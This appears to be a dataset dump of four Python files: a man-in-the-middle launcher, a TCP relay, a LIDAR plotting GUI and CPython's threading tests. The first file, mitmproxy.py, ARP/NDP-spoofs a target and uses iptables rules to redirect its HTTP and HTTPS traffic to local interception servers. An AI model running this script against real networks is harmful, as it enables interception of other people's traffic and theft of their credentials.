source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
mitmproxy.py
|
import arpspoof as spoof
import ndpspoof
import ssl_server
import http_server
import netifaces as ni
import time
import argparse
import subprocess
from multiprocessing import Process
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("interface", type=str,
help="network interface")
parser.add_argument("-t", type=str,
help="target ip", nargs='?', default=None)
parser.add_argument("-t6", type=str,
help="target ipv6", nargs='?', default=None)
args = parser.parse_args()
if args.t is None and args.t6 is None:
print("you have to specify at least a target ipv4 or ipv6 (-t or -t6)")
exit(-1)
try:
if args.t is not None:
subprocess.run('echo "1" > /proc/sys/net/ipv4/ip_forward', shell=True)
subprocess.run('iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 4433', shell=True)
subprocess.run('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080',
shell=True)
spoof.arpspoof(args.t, args.interface)
if args.t6 is not None:
subprocess.run('sysctl -w net.ipv6.conf.all.forwarding=1', shell=True)
subprocess.run('ip6tables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4433',
shell=True)
subprocess.run('ip6tables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080',
shell=True)
ndpspoof.ndpspoof(args.t6, args.interface)
host_ip = ni.ifaddresses(args.interface)[2][0]['addr']
Process(target=http_server.start_server, args=([host_ip])).start()
Process(target=ssl_server.start_server, args=[(host_ip)]).start()
while 1:
time.sleep(1)
except KeyboardInterrupt:
print("[*] User interrupt")
spoof.stop = 0
ndpspoof.stop = 0
ssl_server.stop = 0
http_server.stop = 0
|
tcp.py
|
import sys
import socket
import threading
from relay import status
_kill = False
_relay_port = 0
_remote_address = ''
_remote_port = 0
_clients = 0
_servers = 0
_socks = []
def accept_clients():
global _socks
client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_sock.bind(('0.0.0.0', _relay_port))
client_sock.listen(10)
while True:
client_conn, addr = client_sock.accept()
if _kill:
client_sock.close()
for sock in _socks:
sock.close()
return
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.connect((_remote_address, _remote_port))
_socks.append(client_conn)
_socks.append(server_sock)
client_thread = threading.Thread(target=client_worker, kwargs={'client': client_conn, 'server': server_sock})
client_thread.start()
server_thread = threading.Thread(target=server_worker, kwargs={'client': client_conn, 'server': server_sock})
server_thread.start()
def close(client, server):
try:
client.close()
except socket.error:
pass
try:
server.close()
except socket.error:
pass
def client_worker(client, server):
global _clients
_clients += 1
while True:
try:
data = client.recv(1)
if data == '':
close(client, server)
break
server.sendall(data)
status.bytes_to_remote += sys.getsizeof(data)
except socket.error:
close(client, server)
break
_clients -= 1
def server_worker(client, server):
global _servers
_servers += 1
while True:
try:
data = server.recv(1)
if data == '':
close(client, server)
break
client.sendall(data)
status.bytes_from_remote += sys.getsizeof(data)
except socket.error:
close(client, server)
break
_servers -= 1
def start(relay_port, remote_address, remote_port):
global _relay_port
global _remote_address
global _remote_port
_relay_port = relay_port
_remote_address = remote_address
_remote_port = remote_port
accept_thread = threading.Thread(target=accept_clients)
accept_thread.start()
def stop():
global _kill
_kill = True
# connect to the input port therefore allowing the thread to close
quit_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
quit_sock.connect(('127.0.0.1', _relay_port))
quit_sock.close()
|
main.py
|
# RPLIDAR Script
from adafruit_rplidar import RPLidar
from math import pi, floor
import datetime
from queue import Queue
from tkinter import messagebox
import time
from tkinter import *
from tkinter import font as tkFont
import threading
import subprocess
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg, NavigationToolbar2Tk)
# Implement the default Matplotlib key bindings.
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
import os
"""Global Variables"""
# Default port for USB devices
PORT_NAME = '/dev/ttyUSB0'
# Global variable for LIDAR sensor
lidar = RPLidar(None, PORT_NAME)
# Data queue used for passing data from the scan thread to the GUI thread
data_queue = Queue(maxsize=10)
# GUI Global variables
lidar_program_running = True
window = Tk()
figure = plt.Figure(figsize=(30, 30), dpi=100)
ax = figure.add_subplot(111, projection='polar')
export = False
save_menu = ""
def scan():
# Function for generating lidar scan data
global lidar_program_running
# Create array of scan data
scan_data = [0]*360
try:
# Iterate through the scans produced by the LIDAR
for single_scan in lidar.iter_scans():
for (_, angle, distance) in single_scan:
scan_data[min([359, floor(angle)])] = distance
if not data_queue.full():
data_queue.put(scan_data)
except Exception as e:
print("scan error: ", e)
finally:
lidar_program_running = False
"""
Stops the lidar sensor
"""
def stop_sensor():
# Function for stopping the LIDAR scanner gracefully
try:
print("Stopping LIDAR")
lidar.stop()
time.sleep(2)
print("Disconnecting LIDAR")
lidar.disconnect()
except Exception as e:
print("stop_sensor error: ", e)
return
def draw_points():
# Function for updating the GUI canvas
global export
data_export = []
try:
# Grab the first data point in the queue
scan_points = data_queue.get()
if scan_points:
# Clear the polar plot
ax.clear()
# Loop through the list of data points
for angle in range(360):
# Assign a distance for each angle
distance = scan_points[angle]
# Convert angle from degrees to radians
radians = angle * pi / 180.0
if export:
data_export.append([angle, distance])
# Plot the data points on the polar graph
ax.plot(radians, distance, "ro", alpha=1)
if export:
export = False
show_save_menu(data_export)
# Draw the figure
ax.figure.canvas.draw()
except Exception as e:
# FOR DEBUG ---
# if export:
# export = False
# for i in range(0,20):
# data_export.append([i, "test"])
# show_save_menu(data_export)
print("draw_points error: ", e)
finally:
if lidar_program_running:
window.after(100, draw_points)
def exit():
try:
stop_sensor()
except Exception as e:
print("exit error: ", e)
finally:
time.sleep(1)
window.quit()
def save_data(val: list, loc: str):
global save_menu
filename = f'/home/pi/{loc}/export_{datetime.datetime.now().strftime("%d-%m-%Y_%I:%M_%s")}.csv'
export_file = open(filename, "w")
export_file.write(f'Angle,Distance \n')
# Loop through the list of data points
for elem in val:
export_file.write(f'{elem[0]}, {elem[1]} \n')
messagebox.showinfo("Success","Data exported to " + filename, parent=save_menu)
save_menu.destroy()
return
def show_save_menu(val):
global save_menu
print("exporting")
helv36 = tkFont.Font(family='Helvetica', size=40, weight=tkFont.BOLD) # configures the font for the widgets
disks = subprocess.check_output("cd ~ && ls -d */", shell=True).decode("utf8").replace("/","").split("\n")[0:-1] # uses this command to get the disk names and stores them in a list
save_menu = Toplevel(window)
popup = Frame(save_menu)
popup.place(relx = 0.5,
rely = 0.5,
anchor = 'center')
save_menu.geometry(f'{window.winfo_screenwidth()}x{window.winfo_screenheight()}') # Size of the window
save_menu.title("Export to:")
my_str1 = StringVar()
l1 = Label(popup, textvariable=my_str1, width=20, font=tkFont.Font(family='Helvetica', size=30, weight=tkFont.BOLD) )
l1.grid(row=1, column=1)
my_str1.set("Save to:")
# listbox with disk names
items = Listbox(popup, width=30, height=15, font=tkFont.Font(family='Helvetica', size=30, weight=tkFont.BOLD))
ct = 0
for disk in disks:
items.insert(ct, disk)
ct+=1
items.grid(row=2, column=1)
save_button = Button(popup, width=20, height=3, text="Save", command=lambda: save_data(val=val, loc=disks[items.curselection()[0]]), bg="red", fg="white",
font=helv36)
save_button.grid(row=3, column=1)
def start_export():
global export
export = True
def setup_gui():
# This function setps up the GUI
# Set window title
window.title("Lidar Applicataion")
# Set window to fill entire screen
window.geometry(f'{window.winfo_screenwidth()}x{window.winfo_screenheight()}')
helv36 = tkFont.Font(family='Helvetica', size=40, weight=tkFont.BOLD) # configures the font for the widgets
window.rowconfigure(0, minsize=100, weight=1)
window.columnconfigure(1, minsize=100, weight=1) # The main window for the application
buttons = Frame(window)
buttons.grid(row=0, column=0)
start = Button(buttons, width=20, height=3, text="Start", command=draw_points, bg="green", fg="white",
font=helv36) # start scan button (TO-DO)
start.pack()
stop = Button(buttons, width=20, height=3, command=stop_sensor, text="Stop", fg="white", bg="black",
font=helv36) # stop scan button (TO-DO)
stop.pack()
save = Button(buttons, width=20, height=3, command=start_export, text="Save", bg="blue", fg="white", font=helv36) # save button (TO-DO)
save.pack()
close = Button(buttons, width=20, height=3, text="Exit", command=exit, bg="red", fg="white",
font=helv36) # close button
close.pack()
# frame for plot
plot = Frame(master=window)
plot.grid(row=0, column=1)
ax.set_rlabel_position(-22.5) # Move radial labels away from plotted line
ax.grid(True)
canvas = FigureCanvasTkAgg(figure, plot) # adds the plot to the GUI
canvas.get_tk_widget().pack()
return
if __name__ == "__main__":
# Program entry point
# Print Lidar Information
print(lidar.info)
# Call setup code for GUI
setup_gui()
# Create thread for running scanner
scan_thread = threading.Thread(target=scan)
# Set scan thread to terminate itself after program is complete
scan_thread.setDaemon(True)
# Start the scanning thread
scan_thread.start()
# Call the GUI loop
window.mainloop()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(DeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertTrue(os.WIFEXITED(status))
self.assertEqual(10, os.WEXITSTATUS(status))
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
@requires_type_collecting
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
